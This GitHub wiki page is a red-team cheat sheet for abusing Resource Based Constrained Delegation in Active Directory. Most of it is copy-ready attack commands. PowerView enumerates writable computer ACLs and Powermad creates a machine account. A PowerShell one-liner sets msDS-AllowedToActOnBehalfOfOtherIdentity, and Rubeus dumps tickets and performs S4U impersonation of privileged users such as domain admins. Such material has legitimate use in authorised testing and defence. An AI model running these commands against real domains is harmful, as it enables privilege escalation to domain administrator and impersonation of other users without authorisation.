Resource Based Constrained Delegation (RBCD) - CraigDonkin/Infrastructure GitHub Wiki
- RBCD allows delegation on the target rather then the source.
ms-DS-AllowedToActOnBehalfOfOtherIdentity
-
To modify this attribute you need a privilege on the computer object
- WriteProperty
- GenericAll
- GenericWrite
- WriteDacl
-
A user might be able to create a new computer object in Active Directory and then set a SPN.
- If they can't create a new computer, but are local admin to a machine, then this can be used.
-
The write privileges the user has on the new computer can be used to configure RBCD to allow the SPN to impersonate any user against the victim computer.
-
A full S4U attack is conducted from the SPN to the new computer object for a user that has privileged access to the new computer object. Such as a DA.
-
Then perform a PTT and impersonate the user.
- With PowerView:
powershell Get-DomainComputer | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ActiveDirectoryRights -match "WriteProperty|GenericWrite|GenericAll|WriteDacl" -and $_.SecurityIdentifier -match "S-1-5-21-569305411-121244042-2357301523-[\d]{4,10}" }
powershell Get-DomainObject -Identity "DC=<DC>" -Properties ms-DS-MachineAccountQuota
powershell Get-DomainComputer -Identity <computer name> -Properties objectSid
powershell $sd = New-Object Security.AccessControl.RawSecurityDescriptor "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;<SID>)"; $sddb = New-Object byte[] ($sd.BinaryLength); $sd.GetBinaryForm($sddb, 0); Get-DomainComputer -Identity "<computername>" | Set-DomainObject -Set @{'msDS-AllowedToActOnBehalfOfOtherIdentity' = $sddb} -Verbose
- The SID needs to be the SID of the domain computer you are local admin to.
- The
Get-Domain-Computer -Identityvalue is the server you have WriteProperty rights to. This is the server where themsDS-AllowedToActOnBehalfOfOtherIdentityattribute is being set on.
- Use the machine account on the computer you control to perform S4U impersonation with a TGT or hash (RC4/AES).
Rubeus.exe triage
Rubeus.exe dump /luid:<luid> /service:krbtgt /nowrap
Rubeus.exe s4u /user:<machine account> /impersonateuser:<user to impersonate> /msdsspn:<SPN> /ticket:<TGT>
Rubeus.exe createnetonly /program:<program> /domain:<domain> /username:<username> /password:<fakepassword> /ticket:<ticket>
StandIn.exe --computer <computername> --make
import-module powermad
New-MachineAccount -MachineAccount <computername> -Password $(ConvertTo-SecureString '<computer password>' -AsPlainText -Force) -Verbose
Rubeus.exe hash /password:<password> /user:<computername>$ /domain:<domain>
Rubeus.exe asktgt /user:<computer>$ /aes256:<hash> /nowrap
powershell $sd = New-Object Security.AccessControl.RawSecurityDescriptor "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;<SID>)"; $sddb = New-Object byte[] ($sd.BinaryLength); $sd.GetBinaryForm($sddb, 0); Get-DomainComputer -Identity "<computername>" | Set-DomainObject -Set @{'msDS-AllowedToActOnBehalfOfOtherIdentity' = $sddb} -Verbose
- The SID needs to be the SID of the domain computer you created
- The
Get-Domain-Computer -Identityvalue is the server you have WriteProperty rights to. This is the server where themsDS-AllowedToActOnBehalfOfOtherIdentityattribute is being set on.
- Use the machine account on the computer you control to perform S4U impersonation with a TGT or hash (RC4/AES).
Rubeus.exe s4u /user:<machine account> /impersonateuser:<user to impersonate> /msdsspn:<SPN> /ticket:<TGT>
Rubeus.exe createnetonly /program:<program> /domain:<domain> /username:<username> /password:<fakepassword> /ticket:<ticket>
powershell Get-DomainComputer -Identity <computer> | Set-DomainObject -Clear msDS-AllowedToActOnBehalfOfOtherIdentity